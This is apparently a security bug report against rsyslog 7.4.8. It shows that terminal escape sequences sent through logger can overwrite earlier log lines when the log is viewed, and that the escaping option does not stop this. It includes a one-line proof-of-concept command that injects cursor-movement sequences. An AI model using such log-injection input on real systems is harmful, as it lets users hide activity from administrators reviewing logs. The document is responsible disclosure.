Package: rsyslog
Version: 7.4.8
Severity: important
Tags: security
Hi,
It seems to me that it is possible to inject terminal escape sequences
into log files via syslog(3)
# tail -f /var/log/messages
Aug 23 13:50:33 ghetto kernel: ACPI Error: Method parse/execution
failed [\_GPE._L10] (Node ffff88017b0e47d0), AE_NOT_FOUND
(20141107/psparse-536)
(*) Aug 23 13:50:33 ghetto kernel: ACPI Exception: AE_NOT_FOUND, while
evaluating GPE method [_L10] (20141107/evgpe-581)
$ logger `printf 'HELLO\n\033[2AAAAAAAAAAAAAA\033[2B'`
# tail -f /var/log/messages
Aug 23 13:50:33 ghetto kernel: ACPI Error: Method parse/execution
failed [\_GPE._L10] (Node ffff88017b0e47d0), AE_NOT_FOUND
(20141107/psparse-536)
(*) Aug 23 13:50:33 ghetto kernel: ACPI AAAAAAAAAAAAA_NOT_FOUND, while
evaluating GPE method [_L10] (20141107/evgpe-581)
Aug 23 13:50:39 ghetto saken: HELLO
On the (*) line, the escape sequence changed its contents, meaning
that an unprivileged user can take advantage of this to hide their
presence on the system by changing legitimate logs, modify a window's
title, change background and foreground color, etc.
While researching this, I found that rsyslogd has
"$EscapeControlCharactersOnReceive" which claims that is on by default
and that "The intent is to provide a way to stop non-printable
messages from entering the syslog system as whole."
On my system, this does not seem to be true, and actually went ahead
and added "$EscapeControlCharactersOnReceive on" to the
/etc/rsyslog.conf file, restarted rsyslog and the problem still
persists.
I am using rsyslogd 7.4.8
Thanks,
Federico Bento.
----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.